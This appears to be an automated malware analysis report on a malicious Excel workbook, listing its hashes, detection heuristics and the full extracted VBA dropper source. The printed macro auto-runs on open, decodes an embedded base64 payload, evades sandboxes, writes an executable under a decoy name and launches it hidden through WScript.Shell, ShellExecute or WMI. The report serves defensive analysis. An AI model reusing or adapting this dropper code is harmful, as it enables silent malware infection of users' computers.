Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 cf5132bc98855c4a…

MALICIOUS

Office (OOXML) / .XLSX

Size: 56.4 KB
Created: 2026-03-31 07:21:21 UTC
Authoring application: Microsoft Excel 12.0000
First seen: 2026-06-18
MD5: 8bd0ce08991896fa242e455631b2bb89
SHA-1: 71f2f3161bfc5bd937f17c1a8d649ac37ba6e1b6
SHA-256: cf5132bc98855c4aab109293282ede0c05f070b375c9c62e1efddc41b653acd2
Risk Score: 468

Heuristics (13)

  • ClamAV: Xls.Dropper.Generic-6595971-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Generic-6595971-0
  • VBA project inside OOXML medium 9 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
            Case 0 ' Method A: Standard WScript.Shell
                Dim shell As Object
                Set shell = CreateObject("WScript.Shell")
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
                Dim shell As Object
                Set shell = CreateObject("WScript.Shell")
                shell.Run fullPath, 0, False
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
    Matched line in script
        Dim xmlNode As Object
        Set xmlDoc = CreateObject("MSXML2.DOMDocument")
        Set xmlNode = xmlDoc.createElement("b64")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Dim xmlNode As Object
        Set xmlDoc = CreateObject("MSXML2.DOMDocument")
        Set xmlNode = xmlDoc.createElement("b64")
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
                Dim wmi As Object
                Set wmi = GetObject("winmgmts:root\cimv2")
                wmi.Get("Win32_Process").Create fullPath, Null, Null, Null
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
        RunDropper
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
        RunDropper
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        Select Case pathChoice
            Case 0: dropPath = Environ("TEMP")
            Case 1: dropPath = Environ("APPDATA")
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • URL https://webhook.site/a72d8905-b15f-4e95-9a8f-5e4bb7dc9b3d (in document text: OOXML body / shared strings)
    • URL http://schemas.microsoft.com/windows/2004/02/mit/task (in document text: OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 6354 bytes
SHA-256: 01644b3bf60b0b30175eff405741fca650128a5ac991bed7cd9f7d6d1065f967
Preview script
First 1,000 lines of the extracted script
Sub AutoOpen()
    RunDropper
End Sub

Sub Workbook_Open()
    RunDropper
End Sub

Sub RunDropper()
    On Error Resume Next
    Dim xmlPart As Object
    Dim base64String As String
    Dim dropPath As String
    Dim exeName As String
    Dim fullPath As String
    Dim binaryData() As Byte
    Dim fNum As Integer
    Dim hostObj As Object

    ' Initialize Randomizer
    Randomize

    ' 1. Identify the Correct Host Object
    Select Case Application.Name
        Case "Microsoft Word"
            Set hostObj = ActiveDocument
        Case "Microsoft Excel"
            Set hostObj = ActiveWorkbook
        Case "Microsoft PowerPoint"
            Set hostObj = ActivePresentation
    End Select

    If hostObj Is Nothing Then Exit Sub

    ' 2. Locate the payload in CustomXMLParts
    For Each xmlPart In hostObj.CustomXMLParts
        If xmlPart.DocumentElement.BaseName = "payload" Then
            base64String = xmlPart.DocumentElement.Text
            Exit For
        End If
    Next xmlPart

    If base64String = "" Then Exit Sub

    ' 3. ANTI-SANDBOX DELAY (0 to 4 seconds)
    Dim start As Single
    start = Timer
    Do While Timer < start + Int(Rnd * 5)
        DoEvents
    Loop

    ' 4. MORPHIC DROP PATH
    Dim pathChoice As Integer
    pathChoice = Int(Rnd * 4)
    Select Case pathChoice
        Case 0: dropPath = Environ("TEMP")
        Case 1: dropPath = Environ("APPDATA")
        Case 2: dropPath = Environ("LOCALAPPDATA")
        Case 3: dropPath = Environ("PUBLIC")
    End Select
    If dropPath = "" Then dropPath = Environ("TEMP")

    ' 5. DECOY NAME SELECTION
    Dim names As Variant
    names = Array("win_update_svc.exe", "chrome_patch_05.exe", "trusted_installer_patch.exe", _
                  "system_diag_fix.exe", "office_repair_kit.exe", "nvidia_driver_updater.exe", _
                  "svchost_helper.exe", "defender_sig_update.exe")
    exeName = names(Int(Rnd * (UBound(names) + 1)))
    fullPath = dropPath & "\" & exeName

    ' 6. DECODE BASE64
    Dim xmlDoc As Object
    Dim xmlNode As Object
    Set xmlDoc = CreateObject("MSXML2.DOMDocument")
    Set xmlNode = xmlDoc.createElement("b64")
    xmlNode.DataType = "bin.base64"
    xmlNode.Text = base64String
    binaryData = xmlNode.nodeTypedValue

    ' 7. WRITE TO DISK
    fNum = FreeFile
    Open fullPath For Binary Access Write As #fNum
    Put #fNum, , binaryData
    Close #fNum

    ' 8. MORPHIC EXECUTION
    Dim execChoice As Integer
    execChoice = Int(Rnd * 3) ' 3 methods
    
    Select Case execChoice
        Case 0 ' Method A: Standard WScript.Shell
            Dim shell As Object
            Set shell = CreateObject("WScript.Shell")
            shell.Run fullPath, 0, False
            
        Case 1 ' Method B: Shell.Application.ShellExecute
            Dim sa As Object
            Set sa = CreateObject("Shell.Application")
            sa.ShellExecute fullPath, "", "", "open", 0
            
        Case 2 ' Method C: WMI (Win32_Process.Create)
            Dim wmi As Object
            Set wmi = GetObject("winmgmts:root\cimv2")
            wmi.Get("Win32_Process").Create fullPath, Null, Null, Null
            
    End Select

End Sub

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: xl/vbaProject.bin
Size: 18944 bytes
SHA-256: 7c95f0d93f64b19b222d7310df3265853bf5dccfc99d2b1754c0050ba01edee7
Detection
ClamAV: Xls.Dropper.Generic-6595971-0
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).